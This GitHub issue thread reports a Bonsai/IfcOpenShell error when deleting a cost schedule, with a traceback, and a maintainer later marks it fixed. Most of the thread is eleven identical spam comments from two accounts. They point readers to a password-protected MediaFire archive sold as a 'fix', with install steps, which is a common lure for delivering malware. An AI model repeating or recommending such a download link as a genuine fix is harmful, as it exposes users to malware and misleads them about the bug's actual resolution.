### ISSUE TITLE
error when deleting a cost schedule

### ISSUE THREAD

**Issue by steverugi** [IfcOpenShell/IfcOpenShell#5264]
```
os: Windows
os_version: 10.0.19045
python_version: 3.11.7
architecture: ('64bit', 'WindowsPE')
machine: AMD64
processor: AMD64 Family 23 Model 96 Stepping 1, AuthenticAMD
blender_version: 4.2.0
bonsai_version: 0.7.11-alpha240830
bonsai_commit_hash: 03935a9
last_actions: 
# ifcopenshell.api: cost.remove_cost_item
>>> {"cost_item": {"cast_type": "entity_instance", "value": 33353, "Name": "D04-900x2050 single swing"}}
# ifcopenshell.api: cost.remove_cost_item
>>> {"cost_item": {"cast_type": "entity_instance", "value": 33356, "Name": "D05-800x2050 single swing"}}
# ifcopenshell.api: cost.remove_cost_item
>>> {"cost_item": {"cast_type": "entity_instance", "value": 33359, "Name": "D06-1000x2050 single swing"}}
# ifcopenshell.api: cost.remove_cost_item
>>> {"cost_item": {"cast_type": "entity_instance", "value": 33362, "Name": "D07-900x2050 single swing"}}
# ifcopenshell.api: cost.remove_cost_item
>>> {"cost_item": {"cast_type": "entity_instance", "value": 33365, "Name": "D08-1400x2200 double door single swing"}}
# ifcopenshell.api: cost.remove_cost_item
>>> {"cost_item": {"cast_type": "entity_instance", "value": 33368, "Name": "D09-1600x2200 metal mesh double door"}}
# ifcopenshell.api: cost.remove_cost_item
>>> {"cost_item": {"cast_type": "entity_instance", "value": 33371, "Name": "D10-1400x2200 double door single swing"}}
# ifcopenshell.api: cost.remove_cost_item
>>> {"cost_item": {"cast_type": "entity_instance", "value": 33374, "Name": "D11-1800x2200 double door single swing"}}
# ifcopenshell.api: cost.remove_cost_item
>>> {"cost_item": {"cast_type": "entity_instance", "value": 33377, "Name": "D12-900x2050 single swing"}}
# ifcopenshell.api: cost.remove_cost_item
>>> {"cost_item": {"cast_type": "entity_instance", "value": 33380, "Name": "G01-3200x3000 collapsible gate"}}
last_error: Traceback (most recent call last):
  File "C:\Users\steve\AppData\Roaming\Blender Foundation\Blender\4.2\extensions\.local\lib\python3.11\site-packages\bonsai\bim\ifc.py", line 408, in execute_ifc_operator
    result = getattr(operator, "_execute")(context)
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\steve\AppData\Roaming\Blender Foundation\Blender\4.2\extensions\.local\lib\python3.11\site-packages\bonsai\bim\module\cost\operator.py", line 72, in _execute
    core.remove_cost_schedule(tool.Ifc, tool.Cost, cost_schedule=tool.Ifc.get().by_id(self.cost_schedule))
  File "C:\Users\steve\AppData\Roaming\Blender Foundation\Blender\4.2\extensions\.local\lib\python3.11\site-packages\bonsai\core\cost.py", line 45, in remove_cost_schedule
    cost.remove_stored_schedule_columns(cost_schedule)
  File "C:\Users\steve\AppData\Roaming\Blender Foundation\Blender\4.2\extensions\.local\lib\python3.11\site-packages\bonsai\tool\cost.py", line 71, in remove_stored_schedule_columns
    active_cost_schedule_id = cost_schedule.id()
                              ^^^^^^^^^^^^^^^^^^
  File "C:\Users\steve\AppData\Roaming\Blender Foundation\Blender\4.2\extensions\.local\lib\python3.11\site-packages\ifcopenshell\entity_instance.py", line 430, in id
    return self.wrapped_data.id()
           ^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\steve\AppData\Roaming\Blender Foundation\Blender\4.2\extensions\.local\lib\python3.11\site-packages\ifcopenshell\ifcopenshell_wrapper.py", line 8574, in id
    return _ifcopenshell_wrapper.entity_instance_id(self)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
RuntimeError: An unknown error occurred

ifc: Station_Type1 ARC.ifc
schema: IFC4X3
preprocessor_version: IfcOpenShell 0.7.11-alpha240829
originating_system: Bonsai 0.7.11-alpha240829-15481c0
```

thanks

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Andrej730** [comment]
Fixed, thank you for the bug report!
